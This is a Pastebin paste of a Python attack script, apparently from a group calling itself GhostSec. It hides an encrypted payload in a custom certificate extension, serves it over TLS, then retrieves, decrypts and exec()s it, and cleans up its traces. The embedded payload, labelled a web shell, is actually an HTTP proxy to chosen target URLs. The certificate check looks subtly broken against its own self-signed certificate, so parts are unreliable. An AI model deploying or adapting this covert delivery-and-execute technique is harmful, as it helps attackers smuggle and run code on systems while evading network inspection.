Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Recover All My Accounts Its All Offline And I Was Hoping You Guys Wanted To Play
- #WeAreGhost
- import os
- import ssl
- import socket
- import subprocess
- import datetime
- import base64
- import time
- import traceback
- import argparse
- import logging
- import queue
- import urllib.parse
- import requests
- import concurrent.futures
- import multiprocessing
- from cryptography import x509
- from cryptography.x509.oid import ObjectIdentifier, NameOID
- from cryptography.hazmat.backends import default_backend
- from cryptography.hazmat.primitives import serialization, hashes
- from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
- from cryptography.hazmat.primitives.asymmetric import rsa
- from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
- from colorama import Fore, Style, init
- init(autoreset=True)
- CUSTOM_OID = ObjectIdentifier("1.3.6.1.4.1.99999.1.7")
- SALT = b"Ghosts_Of_No_Nation"
- PASSWORD = b"GhostOfThe7Seas"
- IV = b"0123456789abcdef"
- KEY_PATH = "ghost_leaf.key"
- CERT_PATH = "ghost_leaf.pem"
- PAYLOAD_ENC_PATH = "payload.enc"
- DEFAULT_OPENSSL_PORT = 4433
- LOG_FILE = "ghostsec_tls_poc.log"
- MAX_RETRIES = 3
- RETRY_DELAY = 5
- CONNECTION_TIMEOUT = 10
- MAX_WORKERS = 2
- OPENSSL_BIN = "openssl"
- logging.basicConfig(
- filename=LOG_FILE,
- level=logging.INFO,
- format="%(asctime)s [%(levelname)s] %(message)s",
- datefmt="%Y-%m-%d %H:%M:%S",
- )
- WEB_SHELL_TEMPLATE = """
- import requests
- from http.server import BaseHTTPRequestHandler, HTTPServer
- import urllib.parse
- target_url = "{target_url}"
- class MirrorHandler(BaseHTTPRequestHandler):
- def log_message(self, format, *args): pass
- def _proxy_request(self):
- try:
- method = self.command
- url = target_url + self.path
- headers = {key: val for key, val in self.headers.items()}
- length = int(self.headers.get('Content-Length', 0))
- data = self.rfile.read(length) if length > 0 else None
- session = requests.Session()
- req = requests.Request(method, url, headers=headers, data=data)
- prepped = session.prepare_request(req)
- resp = session.send(prepped, allow_redirects=True, timeout=15)
- self.send_response(resp.status_code)
- for k, v in resp.headers.items():
- if k.lower() not in ['content-encoding', 'transfer-encoding', 'content-length', 'connection']:
- self.send_header(k, v)
- self.end_headers()
- self.wfile.write(resp.content)
- print("[WebShell] → {} {} proxied to {}".format(method, self.path, target_url))
- except Exception as e:
- self.send_error(500, str(e))
- def do_GET(self): self._proxy_request()
- def do_POST(self): self._proxy_request()
- def do_PUT(self): self._proxy_request()
- def do_DELETE(self): self._proxy_request()
- def do_OPTIONS(self): self._proxy_request()
- def do_HEAD(self): self._proxy_request()
- def run():
- print("[WebShell] Online at http://0.0.0.0:8080 → " + target_url)
- HTTPServer(('0.0.0.0', 8080), MirrorHandler).serve_forever()
- run()
- """
- def verbose_log(color, msg):
- print(color + Style.BRIGHT + "[*] " + msg + Style.RESET_ALL)
- logging.info(msg)
- def check_openssl():
- from shutil import which
- path = which(OPENSSL_BIN)
- if not path:
- verbose_log(Fore.RED, "OpenSSL binary not found. Please install openssl package in Termux.")
- exit(1)
- try:
- result = subprocess.run([OPENSSL_BIN, "version"], capture_output=True, text=True)
- if "OpenSSL" not in result.stdout:
- verbose_log(Fore.RED, "OpenSSL binary invalid or not found.")
- exit(1)
- except Exception:
- verbose_log(Fore.RED, "Failed to execute OpenSSL binary.")
- exit(1)
- def generate_rsa_key():
- key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
- with open(KEY_PATH, "wb") as f:
- f.write(key.private_bytes(
- encoding=serialization.Encoding.PEM,
- format=serialization.PrivateFormat.TraditionalOpenSSL,
- encryption_algorithm=serialization.NoEncryption()
- ))
- verbose_log(Fore.GREEN, f"Private key saved to {KEY_PATH}")
- return key
- def encrypt_payload(plain_code: str) -> str:
- key = PBKDF2HMAC(
- algorithm=hashes.SHA512(),
- length=32,
- salt=SALT,
- iterations=100000,
- backend=default_backend()
- ).derive(PASSWORD)
- cipher = Cipher(algorithms.AES(key), modes.CFB(IV), backend=default_backend())
- encryptor = cipher.encryptor()
- encrypted = encryptor.update(plain_code.encode()) + encryptor.finalize()
- b64_encoded = base64.b64encode(encrypted).decode()
- with open(PAYLOAD_ENC_PATH, "w") as f:
- f.write(b64_encoded)
- verbose_log(Fore.GREEN, f"Encrypted payload saved to {PAYLOAD_ENC_PATH}")
- return b64_encoded
- def generate_certificate_with_payload(payload_b64: str, key):
- subject = issuer = x509.Name([
- x509.NameAttribute(NameOID.COUNTRY_NAME, u"XZ"),
- x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"GhostSec Underground"),
- x509.NameAttribute(NameOID.COMMON_NAME, u"ghostsec-cert-chain"),
- ])
- now = datetime.datetime.now(datetime.timezone.utc)
- cert_builder = x509.CertificateBuilder().subject_name(subject).issuer_name(issuer).public_key(
- key.public_key()
- ).serial_number(
- x509.random_serial_number()
- ).not_valid_before(
- now
- ).not_valid_after(
- now + datetime.timedelta(days=365)
- ).add_extension(
- x509.UnrecognizedExtension(CUSTOM_OID, payload_b64.encode()), critical=False
- )
- cert = cert_builder.sign(private_key=key, algorithm=hashes.SHA512(), backend=default_backend())
- with open(CERT_PATH, "wb") as f:
- f.write(cert.public_bytes(serialization.Encoding.PEM))
- verbose_log(Fore.GREEN, f"Certificate with embedded payload saved to {CERT_PATH}")
- def launch_openssl_server(port):
- if port < 1024:
- port = 4433
- proc = subprocess.Popen([
- OPENSSL_BIN, "s_server",
- "-accept", str(port),
- "-cert", CERT_PATH,
- "-key", KEY_PATH,
- "-www",
- "-tls1_3",
- "-ciphersuites", "TLS_AES_256_GCM_SHA384:TLS_CHACHA20_POLY1305_SHA256:TLS_AES_128_GCM_SHA256"
- ], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
- verbose_log(Fore.GREEN, f"OpenSSL s_server launched with PID {proc.pid} on 0.0.0.0:{port} with TLS1.3")
- return proc, port
- def get_peer_cert_raw(host, port, retries=MAX_RETRIES, timeout=CONNECTION_TIMEOUT):
- context = ssl.create_default_context()
- context.check_hostname = True
- context.verify_mode = ssl.CERT_REQUIRED
- context.minimum_version = ssl.TLSVersion.TLSv1_2
- context.maximum_version = ssl.TLSVersion.TLSv1_3
- last_exc = None
- for attempt in range(1, retries + 1):
- try:
- with context.wrap_socket(socket.socket(socket.AF_INET), server_hostname=host) as conn:
- conn.settimeout(timeout)
- verbose_log(Fore.YELLOW, f"Connecting to {host}:{port} (attempt {attempt}) to retrieve certificate...")
- conn.connect((host, port))
- der_cert = conn.getpeercert(binary_form=True)
- verbose_log(Fore.GREEN, "[+] Certificate successfully retrieved.")
- return der_cert
- except Exception as e:
- last_exc = e
- verbose_log(Fore.RED, f"Connection attempt {attempt} failed: {e}")
- time.sleep(RETRY_DELAY)
- raise last_exc
- def extract_payload_from_cert(cert_bytes: bytes):
- cert = x509.load_der_x509_certificate(cert_bytes, default_backend())
- try:
- ext = cert.extensions.get_extension_for_oid(CUSTOM_OID)
- verbose_log(Fore.GREEN, f"Custom OID {CUSTOM_OID.dotted_string} found in certificate")
- return ext.value.value
- except Exception:
- verbose_log(Fore.RED, f"OID {CUSTOM_OID.dotted_string} not found.")
- return None
- def decrypt_payload(b64_data: str) -> str:
- encrypted_data = base64.b64decode(b64_data)
- key = PBKDF2HMAC(
- algorithm=hashes.SHA512(),
- length=32,
- salt=SALT,
- iterations=100000,
- backend=default_backend()
- ).derive(PASSWORD)
- cipher = Cipher(algorithms.AES(key), modes.CFB(IV), backend=default_backend())
- decryptor = cipher.decryptor()
- decrypted = decryptor.update(encrypted_data) + decryptor.finalize()
- verbose_log(Fore.GREEN, "Payload decrypted successfully")
- return decrypted.decode()
- def execute_payload_sandboxed(code: str):
- def run_code(queue):
- try:
- exec(code, {"__name__": "__main__"})
- queue.put(None)
- except Exception as e:
- queue.put(traceback.format_exc())
- queue = multiprocessing.Queue()
- p = multiprocessing.Process(target=run_code, args=(queue,))
- p.start()
- p.join(30)
- if p.is_alive():
- p.terminate()
- verbose_log(Fore.RED, "Payload execution timed out and was terminated.")
- else:
- err = queue.get()
- if err:
- verbose_log(Fore.RED, f"Payload execution error:\n{err}")
- else:
- verbose_log(Fore.GREEN, "Payload executed successfully.")
- def validate_url(url: str):
- parsed = urllib.parse.urlparse(url)
- if parsed.scheme not in ("http", "https"):
- raise ValueError("URL scheme must be http or https")
- if not parsed.hostname:
- raise ValueError("URL must have a valid hostname")
- port = parsed.port
- if port is None:
- port = 443 if parsed.scheme == "https" else 80
- try:
- with socket.create_connection((parsed.hostname, port), timeout=CONNECTION_TIMEOUT):
- pass
- except Exception as e:
- raise ConnectionError(f"Cannot connect to {parsed.hostname}:{port} - {e}")
- return url
- def worker_task(target_url, server_host, server_port, results_queue):
- try:
- verbose_log(Fore.MAGENTA, f"Starting workflow for target {target_url} via server {server_host}:{server_port}")
- payload_code = WEB_SHELL_TEMPLATE.format(target_url=target_url)
- key = generate_rsa_key()
- payload_b64 = encrypt_payload(payload_code)
- generate_certificate_with_payload(payload_b64, key)
- openssl_proc, actual_port = launch_openssl_server(server_port)
- time.sleep(3)
- cert_bytes = get_peer_cert_raw(server_host, actual_port)
- b64_payload_extracted = extract_payload_from_cert(cert_bytes)
- if not b64_payload_extracted:
- verbose_log(Fore.RED, "Payload extraction failed.")
- results_queue.put((target_url, False, "Payload extraction failed"))
- return
- decrypted_code = decrypt_payload(b64_payload_extracted)
- execute_payload_sandboxed(decrypted_code)
- results_queue.put((target_url, True, "Success"))
- except Exception as e:
- verbose_log(Fore.RED, f"Error for target {target_url}: {e}")
- results_queue.put((target_url, False, str(e)))
- finally:
- for f in [KEY_PATH, CERT_PATH, PAYLOAD_ENC_PATH]:
- try:
- os.remove(f)
- except FileNotFoundError:
- pass
- if 'openssl_proc' in locals() and openssl_proc.poll() is None:
- openssl_proc.terminate()
- try:
- openssl_proc.wait(timeout=5)
- except subprocess.TimeoutExpired:
- openssl_proc.kill()
- verbose_log(Fore.MAGENTA, f"Cleanup complete for target {target_url}")
- def main():
- from shutil import which
- if not which(OPENSSL_BIN):
- verbose_log(Fore.RED, "OpenSSL binary not found. Please install openssl package in Termux.")
- exit(1)
- parser = argparse.ArgumentParser(description="GhostSec Automated TLS Payload Delivery PoC for Termux non-root TLS1.3")
- parser.add_argument("--target-urls", required=True, nargs="+", help="One or more target URLs for the web shell")
- parser.add_argument("--server-host", default="127.0.0.1", help="OpenSSL server IP or hostname")
- parser.add_argument("--port", type=int, default=DEFAULT_OPENSSL_PORT, help="OpenSSL server port (>=1024 recommended)")
- args = parser.parse_args()
- validated_urls = []
- for url in args.target_urls:
- try:
- validated = validate_url(url)
- validated_urls.append(validated)
- verbose_log(Fore.GREEN, f"Validated target URL: {validated}")
- except Exception as e:
- verbose_log(Fore.RED, f"Invalid target URL '{url}': {e}")
- if not validated_urls:
- verbose_log(Fore.RED, "No valid target URLs provided. Exiting.")
- return
- results_queue = queue.Queue()
- with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
- futures = []
- for url in validated_urls:
- futures.append(executor.submit(worker_task, url, args.server_host, args.port, results_queue))
- for future in concurrent.futures.as_completed(futures):
- pass
- while not results_queue.empty():
- target_url, success, message = results_queue.get()
- if success:
- verbose_log(Fore.GREEN, f"[RESULT] Target {target_url}: Success - {message}")
- else:
- verbose_log(Fore.RED, f"[RESULT] Target {target_url}: Failure - {message}")
- if __name__ == "__main__":
- main()
Add Comment
Please, Sign In to add comment